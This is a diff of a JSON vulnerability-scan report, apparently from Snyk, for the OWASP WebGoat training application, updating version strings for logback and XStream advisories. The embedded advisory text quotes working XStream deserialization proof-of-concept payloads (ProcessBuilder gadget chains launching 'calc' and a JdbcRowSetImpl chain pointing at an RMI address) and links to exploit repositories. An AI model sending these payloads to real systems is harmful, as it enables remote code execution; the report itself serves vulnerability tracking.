+                "markdown": "* Package Manager: maven\n* Module: ch.qos.logback:logback-core\n* Introduced through: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT, org.springframework.boot:spring-boot-starter-validation@3.5.6 and others\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT › org.springframework.boot:spring-boot-starter-validation@3.5.6 › org.springframework.boot:spring-boot-starter@3.5.6 › org.springframework.boot:spring-boot-starter-logging@3.5.6 › ch.qos.logback:logback-classic@1.5.18 › ch.qos.logback:logback-core@1.5.18\nDual license: EPL-1.0, LGPL-2.1"
               },
               "properties": {
-                "tags": [
-                  "security",
-                  "CWE-770",
-                  "maven"
-                ],
-                "cvssv3_baseScore": 7.5,
-                "security-severity": "7.5"
+                "tags": ["security", "maven"],
+                "security-severity": "undefined"
               }
             },
             {
@@ -243,14 +58,10 @@
               },
               "help": {
                 "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: com.thoughtworks.xstream:xstream\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT and com.thoughtworks.xstream:xstream@1.4.5\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › com.thoughtworks.xstream:xstream@1.4.5\n# Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The processed stream at unmarshalling time contains type information to recreate the formerly written objects. XStream creates therefore new instances based on these type information. An attacker can manipulate the processed input stream and replace or inject objects, that can execute arbitrary shell commands.\r\n\r\nThis issue is a variation of CVE-2013-7285, this time using a different set of classes of the Java runtime environment, none of which is part of the XStream default blacklist. The same issue has already been reported for Strut's XStream plugin in CVE-2017-9805, but the XStream project has never been informed about it.\r\n\r\n## PoC\r\n\r\n```\r\n<map>\r\n  <entry>\r\n    <jdk.nashorn.internal.objects.NativeString>\r\n      <flags>0</flags>\r\n      <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>\r\n        <dataHandler>\r\n          <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>\r\n            <contentType>text/plain</contentType>\r\n            <is class='java.io.SequenceInputStream'>\r\n              <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>\r\n                <iterator class='javax.imageio.spi.FilterIterator'>\r\n                  <iter class='java.util.ArrayList$Itr'>\r\n                    <cursor>0</cursor>\r\n                    <lastRet>-1</lastRet>\r\n                    <expectedModCount>1</expectedModCount>\r\n                    <outer-class>\r\n                      <java.lang.ProcessBuilder>\r\n                        <command>\r\n                          <string>calc</string>\r\n                        </command>\r\n                      </java.lang.ProcessBuilder>\r\n                    </outer-class>\r\n                  </iter>\r\n                  <filter class='javax.imageio.ImageIO$ContainsFilter'>\r\n                    <method>\r\n                      <class>java.lang.ProcessBuilder</class>\r\n                      <name>start</name>\r\n                      <parameter-types/>\r\n                    </method>\r\n                    <name>start</name>\r\n                  </filter>\r\n                  <next/>\r\n                </iterator>\r\n                <type>KEYS</type>\r\n              </e>\r\n              <in class='java.io.ByteArrayInputStream'>\r\n                <buf></buf>\r\n                <pos>0</pos>\r\n                <mark>0</mark>\r\n                <count>0</count>\r\n              </in>\r\n            </is>\r\n            <consumed>false</consumed>\r\n          </dataSource>\r\n          <transferFlavors/>\r\n        </dataHandler>\r\n        <dataLen>0</dataLen>\r\n      </value>\r\n    </jdk.nashorn.internal.objects.NativeString>\r\n    <string>test</string>\r\n  </entry>\r\n</map>\r\n```\r\n\r\n*Note:* `1.4.14-jdk7`is optimised for OpenJDK 7,  release `1.4.14` are compatible with other JDK projects.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n  \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n  \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which i"
+                "markdown": "* Package Manager: maven\n* Vulnerable module: com.thoughtworks.xstream:xstream\n* Introduced through: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT and com.thoughtworks.xstream:xstream@1.4.5\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT › com.thoughtworks.xstream:xstream@1.4.5\n# Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The processed stream at unmarshalling time contains type information to recreate the formerly written objects. XStream creates therefore new instances based on these type information. An attacker can manipulate the processed input stream and replace or inject objects, that can execute arbitrary shell commands.\r\n\r\nThis issue is a variation of CVE-2013-7285, this time using a different set of classes of the Java runtime environment, none of which is part of the XStream default blacklist. The same issue has already been reported for Strut's XStream plugin in CVE-2017-9805, but the XStream project has never been informed about it.\r\n\r\n## PoC\r\n\r\n```\r\n<map>\r\n  <entry>\r\n    <jdk.nashorn.internal.objects.NativeString>\r\n      <flags>0</flags>\r\n      <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>\r\n        <dataHandler>\r\n          <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>\r\n            <contentType>text/plain</contentType>\r\n            <is class='java.io.SequenceInputStream'>\r\n              <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>\r\n                <iterator class='javax.imageio.spi.FilterIterator'>\r\n                  <iter class='java.util.ArrayList$Itr'>\r\n                    <cursor>0</cursor>\r\n                    <lastRet>-1</lastRet>\r\n                    <expectedModCount>1</expectedModCount>\r\n                    <outer-class>\r\n                      <java.lang.ProcessBuilder>\r\n                        <command>\r\n                          <string>calc</string>\r\n                        </command>\r\n                      </java.lang.ProcessBuilder>\r\n                    </outer-class>\r\n                  </iter>\r\n                  <filter class='javax.imageio.ImageIO$ContainsFilter'>\r\n                    <method>\r\n                      <class>java.lang.ProcessBuilder</class>\r\n                      <name>start</name>\r\n                      <parameter-types/>\r\n                    </method>\r\n                    <name>start</name>\r\n                  </filter>\r\n                  <next/>\r\n                </iterator>\r\n                <type>KEYS</type>\r\n              </e>\r\n              <in class='java.io.ByteArrayInputStream'>\r\n                <buf></buf>\r\n                <pos>0</pos>\r\n                <mark>0</mark>\r\n                <count>0</count>\r\n              </in>\r\n            </is>\r\n            <consumed>false</consumed>\r\n          </dataSource>\r\n          <transferFlavors/>\r\n        </dataHandler>\r\n        <dataLen>0</dataLen>\r\n      </value>\r\n    </jdk.nashorn.internal.objects.NativeString>\r\n    <string>test</string>\r\n  </entry>\r\n</map>\r\n```\r\n\r\n*Note:* `1.4.14-jdk7`is optimised for OpenJDK 7,  release `1.4.14` are compatible with other JDK projects.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n  \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n  \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n  \n# Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.14 or higher.\n# References\n- [GitHub Commit](https://github.com/x-stream/xstream/commit/0fec095d534126931c99fd38e9c6d41f5c685c1a)\n- [PoC](https://github.com/novysodope/CVE-2020-26217-XStream-RCE-POC)\n- [XStream advisory](https://x-stream.github.io/CVE-2020-26217.html)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2020/CVE-2020-26217.yaml)\n"
               },
               "properties": {
-                "tags": [
-                  "security",
-                  "CWE-502",
-                  "maven"
-                ],
+                "tags": ["security", "CWE-502", "maven"],
                 "cvssv3_baseScore": 8.6,
                 "security-severity": "8.6"
               }
@@ -265,14 +76,10 @@
               },
               "help": {
                 "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: com.thoughtworks.xstream:xstream\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT and com.thoughtworks.xstream:xstream@1.4.5\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › com.thoughtworks.xstream:xstream@1.4.5\n# Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Arbitrary File Deletion. A remote attacker can delete arbitrary known files on the host as long as the executing process has sufficient rights, by manipulating the processed input stream.\n# Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.15 or higher.\n# References\n- [CVE-2020-26259 Details](https://x-stream.github.io/CVE-2020-26259.html)\n- [GitHub Advisory](https://github.com/x-stream/xstream/security/advisories/GHSA-jfvx-7wrx-43fh)\n- [GitHub Commit](https://github.com/x-stream/xstream/commit/0bcbf50126a62dfcd65f93a0da0c6d1ae92aa738)\n- [PoC in GitHub](https://github.com/jas502n/CVE-2020-26259)\n"
+                "markdown": "* Package Manager: maven\n* Vulnerable module: com.thoughtworks.xstream:xstream\n* Introduced through: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT and com.thoughtworks.xstream:xstream@1.4.5\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT › com.thoughtworks.xstream:xstream@1.4.5\n# Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Arbitrary File Deletion. A remote attacker can delete arbitrary known files on the host as long as the executing process has sufficient rights, by manipulating the processed input stream.\n# Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.15 or higher.\n# References\n- [CVE-2020-26259 Details](https://x-stream.github.io/CVE-2020-26259.html)\n- [GitHub Advisory](https://github.com/x-stream/xstream/security/advisories/GHSA-jfvx-7wrx-43fh)\n- [GitHub Commit](https://github.com/x-stream/xstream/commit/0bcbf50126a62dfcd65f93a0da0c6d1ae92aa738)\n- [PoC in GitHub](https://github.com/jas502n/CVE-2020-26259)\n"
               },
               "properties": {
-                "tags": [
-                  "security",
-                  "CWE-22",
-                  "maven"
-                ],
+                "tags": ["security", "CWE-22", "maven"],
                 "cvssv3_baseScore": 5.3,
                 "security-severity": "5.3"
               }
@@ -287,14 +94,10 @@
               },
               "help": {
                 "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: com.thoughtworks.xstream:xstream\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT and com.thoughtworks.xstream:xstream@1.4.5\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › com.thoughtworks.xstream:xstream@1.4.5\n# Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Server-Side Request Forgery (SSRF). A remote attacker can request data from internal resources that are not publicly available by manipulating the processed input stream.\r\n\r\n*Note:* This vulnerability does not exist running Java 15 or higher, and is only relevant when using `XStream`'s default blacklist.\n# Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.15 or higher.\n# References\n- [Exploit Repo](https://github.com/Al1ex/CVE-2020-26258)\n- [GitHub Commit](https://github.com/x-stream/xstream/commit/6740c04b217aef02d44fba26402b35e0f6f493ce)\n- [XStream Advisory](https://x-stream.github.io/CVE-2020-26258.html)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2020/CVE-2020-26258.yaml)\n"
+                "markdown": "* Package Manager: maven\n* Vulnerable module: com.thoughtworks.xstream:xstream\n* Introduced through: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT and com.thoughtworks.xstream:xstream@1.4.5\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT › com.thoughtworks.xstream:xstream@1.4.5\n# Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Server-Side Request Forgery (SSRF). A remote attacker can request data from internal resources that are not publicly available by manipulating the processed input stream.\r\n\r\n*Note:* This vulnerability does not exist running Java 15 or higher, and is only relevant when using `XStream`'s default blacklist.\n# Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.15 or higher.\n# References\n- [Exploit Repo](https://github.com/Al1ex/CVE-2020-26258)\n- [GitHub Commit](https://github.com/x-stream/xstream/commit/6740c04b217aef02d44fba26402b35e0f6f493ce)\n- [XStream Advisory](https://x-stream.github.io/CVE-2020-26258.html)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2020/CVE-2020-26258.yaml)\n"
               },
               "properties": {
-                "tags": [
-                  "security",
-                  "CWE-918",
-                  "maven"
-                ],
+                "tags": ["security", "CWE-918", "maven"],
                 "cvssv3_baseScore": 6.5,
                 "security-severity": "6.5"
               }
@@ -309,14 +112,10 @@
               },
               "help": {
                 "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: com.thoughtworks.xstream:xstream\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT and com.thoughtworks.xstream:xstream@1.4.5\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › com.thoughtworks.xstream:xstream@1.4.5\n# Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability which may allow a remote attacker who has sufficient rights to execute local commands on the host only by manipulating the processed input stream. \r\n\r\n## PoC\r\n```\r\n<java.util.PriorityQueue serialization='custom'>\r\n  <unserializable-parents/>\r\n  <java.util.PriorityQueue>\r\n    <default>\r\n      <size>2</size>\r\n      <comparator class='sun.awt.datatransfer.DataTransferer$IndexOrderComparator'>\r\n        <indexMap class='com.sun.xml.internal.ws.client.ResponseContext'>\r\n          <packet>\r\n            <message class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'>\r\n              <dataSource class='com.sun.xml.internal.ws.message.JAXBAttachment'>\r\n                <bridge class='com.sun.xml.internal.ws.db.glassfish.BridgeWrapper'>\r\n                  <bridge class='com.sun.xml.internal.bind.v2.runtime.BridgeImpl'>\r\n                    <bi class='com.sun.xml.internal.bind.v2.runtime.ClassBeanInfoImpl'>\r\n                      <jaxbType>com.sun.corba.se.impl.activation.ServerTableEntry</jaxbType>\r\n                      <uriProperties/>\r\n                      <attributeProperties/>\r\n                      <inheritedAttWildcard class='com.sun.xml.internal.bind.v2.runtime.reflect.Accessor$GetterSetterReflection'>\r\n                        <getter>\r\n                          <class>com.sun.corba.se.impl.activation.ServerTableEntry</class>\r\n                          <name>verify</name>\r\n                          <parameter-types/>\r\n                        </getter>\r\n                      </inheritedAttWildcard>\r\n                    </bi>\r\n                    <tagName/>\r\n                    <context>\r\n                      <marshallerPool class='com.sun.xml.internal.bind.v2.runtime.JAXBContextImpl$1'>\r\n                        <outer-class reference='../..'/>\r\n                      </marshallerPool>\r\n                      <nameList>\r\n                        <nsUriCannotBeDefaulted>\r\n                          <boolean>true</boolean>\r\n                        </nsUriCannotBeDefaulted>\r\n                        <namespaceURIs>\r\n                          <string>1</string>\r\n                        </namespaceURIs>\r\n                        <localNames>\r\n                          <string>UTF-8</string>\r\n                        </localNames>\r\n                      </nameList>\r\n                    </context>\r\n                  </bridge>\r\n                </bridge>\r\n                <jaxbObject class='com.sun.corba.se.impl.activation.com.sun.corba.se.impl.activation.ServerTableEntry'>\r\n                  <activationCmd>calc</activationCmd>\r\n                </jaxbObject>\r\n              </dataSource>\r\n            </message>\r\n            <satellites/>\r\n            <invocationProperties/>\r\n          </packet>\r\n        </indexMap>\r\n      </comparator>\r\n    </default>\r\n    <int>3</int>\r\n    <string>javax.xml.ws.binding.attachments.inbound</string>\r\n    <string>javax.xml.ws.binding.attachments.inbound</string>\r\n  </java.util.PriorityQueue>\r\n</java.util.PriorityQueue>\r\n```\r\n\r\nUsers who follow [the recommendation](https://x-stream.github.io/security.html#workaround) to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n  \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n  \n\n> Developers put too much trust in Java Object Serialization. Some even de"
+                "markdown": "* Package Manager: maven\n* Vulnerable module: com.thoughtworks.xstream:xstream\n* Introduced through: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT and com.thoughtworks.xstream:xstream@1.4.5\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT › com.thoughtworks.xstream:xstream@1.4.5\n# Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability which may allow a remote attacker who has sufficient rights to execute local commands on the host only by manipulating the processed input stream. \r\n\r\n## PoC\r\n```\r\n<java.util.PriorityQueue serialization='custom'>\r\n  <unserializable-parents/>\r\n  <java.util.PriorityQueue>\r\n    <default>\r\n      <size>2</size>\r\n      <comparator class='sun.awt.datatransfer.DataTransferer$IndexOrderComparator'>\r\n        <indexMap class='com.sun.xml.internal.ws.client.ResponseContext'>\r\n          <packet>\r\n            <message class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'>\r\n              <dataSource class='com.sun.xml.internal.ws.message.JAXBAttachment'>\r\n                <bridge class='com.sun.xml.internal.ws.db.glassfish.BridgeWrapper'>\r\n                  <bridge class='com.sun.xml.internal.bind.v2.runtime.BridgeImpl'>\r\n                    <bi class='com.sun.xml.internal.bind.v2.runtime.ClassBeanInfoImpl'>\r\n                      <jaxbType>com.sun.corba.se.impl.activation.ServerTableEntry</jaxbType>\r\n                      <uriProperties/>\r\n                      <attributeProperties/>\r\n                      <inheritedAttWildcard class='com.sun.xml.internal.bind.v2.runtime.reflect.Accessor$GetterSetterReflection'>\r\n                        <getter>\r\n                          <class>com.sun.corba.se.impl.activation.ServerTableEntry</class>\r\n                          <name>verify</name>\r\n                          <parameter-types/>\r\n                        </getter>\r\n                      </inheritedAttWildcard>\r\n                    </bi>\r\n                    <tagName/>\r\n                    <context>\r\n                      <marshallerPool class='com.sun.xml.internal.bind.v2.runtime.JAXBContextImpl$1'>\r\n                        <outer-class reference='../..'/>\r\n                      </marshallerPool>\r\n                      <nameList>\r\n                        <nsUriCannotBeDefaulted>\r\n                          <boolean>true</boolean>\r\n                        </nsUriCannotBeDefaulted>\r\n                        <namespaceURIs>\r\n                          <string>1</string>\r\n                        </namespaceURIs>\r\n                        <localNames>\r\n                          <string>UTF-8</string>\r\n                        </localNames>\r\n                      </nameList>\r\n                    </context>\r\n                  </bridge>\r\n                </bridge>\r\n                <jaxbObject class='com.sun.corba.se.impl.activation.com.sun.corba.se.impl.activation.ServerTableEntry'>\r\n                  <activationCmd>calc</activationCmd>\r\n                </jaxbObject>\r\n              </dataSource>\r\n            </message>\r\n            <satellites/>\r\n            <invocationProperties/>\r\n          </packet>\r\n        </indexMap>\r\n      </comparator>\r\n    </default>\r\n    <int>3</int>\r\n    <string>javax.xml.ws.binding.attachments.inbound</string>\r\n    <string>javax.xml.ws.binding.attachments.inbound</string>\r\n  </java.util.PriorityQueue>\r\n</java.util.PriorityQueue>\r\n```\r\n\r\nUsers who follow [the recommendation](https://x-stream.github.io/security.html#workaround) to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n  \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n  \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n  \n# Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.16 or higher.\n# References\n- [XStream Advisory](https://x-stream.github.io/CVE-2021-21345.html)\n- [XStream Changelog](http://x-stream.github.io/changes.html#1.4.16)\n- [XStream Workaround](https://x-stream.github.io/security.html#workaround)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-21345.yaml)\n"
               },
               "properties": {
-                "tags": [
-                  "security",
-                  "CWE-502",
-                  "maven"
-                ],
+                "tags": ["security", "CWE-502", "maven"],
                 "cvssv3_baseScore": 5.8,
                 "security-severity": "5.8"
               }
@@ -331,36 +130,10 @@
               },
               "help": {
                 "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: com.thoughtworks.xstream:xstream\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT and com.thoughtworks.xstream:xstream@1.4.5\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › com.thoughtworks.xstream:xstream@1.4.5\n# Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability which may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream.\r\n\r\n## PoC\r\n```\r\n<java.util.PriorityQueue serialization='custom'>\r\n  <unserializable-parents/>\r\n  <java.util.PriorityQueue>\r\n    <default>\r\n      <size>2</size>\r\n      <comparator class='sun.awt.datatransfer.DataTransferer$IndexOrderComparator'>\r\n        <indexMap class='com.sun.xml.internal.ws.client.ResponseContext'>\r\n          <packet>\r\n            <message class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'>\r\n              <dataSource class='com.sun.xml.internal.ws.message.JAXBAttachment'>\r\n                <bridge class='com.sun.xml.internal.ws.db.glassfish.BridgeWrapper'>\r\n                  <bridge class='com.sun.xml.internal.bind.v2.runtime.BridgeImpl'>\r\n                    <bi class='com.sun.xml.internal.bind.v2.runtime.ClassBeanInfoImpl'>\r\n                      <jaxbType>com.sun.rowset.JdbcRowSetImpl</jaxbType>\r\n                      <uriProperties/>\r\n                      <attributeProperties/>\r\n                      <inheritedAttWildcard class='com.sun.xml.internal.bind.v2.runtime.reflect.Accessor$GetterSetterReflection'>\r\n                        <getter>\r\n                          <class>com.sun.rowset.JdbcRowSetImpl</class>\r\n                          <name>getDatabaseMetaData</name>\r\n                          <parameter-types/>\r\n                        </getter>\r\n                      </inheritedAttWildcard>\r\n                    </bi>\r\n                    <tagName/>\r\n                    <context>\r\n                      <marshallerPool class='com.sun.xml.internal.bind.v2.runtime.JAXBContextImpl$1'>\r\n                        <outer-class reference='../..'/>\r\n                      </marshallerPool>\r\n                      <nameList>\r\n                        <nsUriCannotBeDefaulted>\r\n                          <boolean>true</boolean>\r\n                        </nsUriCannotBeDefaulted>\r\n                        <namespaceURIs>\r\n                          <string>1</string>\r\n                        </namespaceURIs>\r\n                        <localNames>\r\n                          <string>UTF-8</string>\r\n                        </localNames>\r\n                      </nameList>\r\n                    </context>\r\n                  </bridge>\r\n                </bridge>\r\n                <jaxbObject class='com.sun.rowset.JdbcRowSetImpl' serialization='custom'>\r\n                  <javax.sql.rowset.BaseRowSet>\r\n                    <default>\r\n                      <concurrency>1008</concurrency>\r\n                      <escapeProcessing>true</escapeProcessing>\r\n                      <fetchDir>1000</fetchDir>\r\n                      <fetchSize>0</fetchSize>\r\n                      <isolation>2</isolation>\r\n                      <maxFieldSize>0</maxFieldSize>\r\n                      <maxRows>0</maxRows>\r\n                      <queryTimeout>0</queryTimeout>\r\n                      <readOnly>true</readOnly>\r\n                      <rowSetType>1004</rowSetType>\r\n                      <showDeleted>false</showDeleted>\r\n                      <dataSource>rmi://localhost:15000/CallRemoteMethod</dataSource>\r\n                      <params/>\r\n                    </default>\r\n                  </javax.sql.rowset.BaseRowSet>\r\n                  <com.sun.rowset.JdbcRowSetImpl>\r\n                    <default>\r\n                      <iMatchColumns>\r\n                        <int>-1</int>\r\n                        <int>-1</int>\r\n                        <int>-1</int>\r\n                        <int>-1</int>\r\n                        <int>-1</int>\r\n                        <int>-1</int>\r\n                        <int>-1</int>\r\n                        <int>-1</int>\r\n                        <int>-1</int>\r\n                        <int>-1</int>\r\n                      </iMatchColumns>\r\n                      <strMatchColumns>\r\n                        <string>foo</string>\r\n                        <null/>\r\n                        <null/>\r\n                        <null/>\r\n                        <null/>\r\n                        <null/>\r\n                        <null/>\r\n                        <null/>\r\n                        <null/>\r\n                        <null/>\r\n                      </strMatchColumns>\r\n                    </default>\r\n                  </com.sun.rowset.JdbcRowSetImpl>\r\n                </jaxbObject>\r\n              </dataSource>\r\n            </message>\r\n            <satellites/>\r\n            <invocationProperties/>\r\n          </packet>\r\n        </indexMap>\r\n      </comparator>\r\n    </default>\r\n    <int>3</int>\r\n    <string>javax.xml.ws.binding.attachments.inbound</string>\r\n    <string>javax.xml.ws.binding.attachments.inbound</string>\r\n  </java.util.PriorityQueue>\r\n</java.util.PriorityQueue>\r\n```\r\n\r\nUsers who follow [the recommendation](https://x-stream.github.io/sec"
-              },
-              "properties": {
-                "tags": [
-                  "security",
-                  "CWE-502",
-                  "maven"
-                ],
-                "cvssv3_baseScore": 5.3,
-                "security-severity": "5.3"
-              }
-            },
-            {
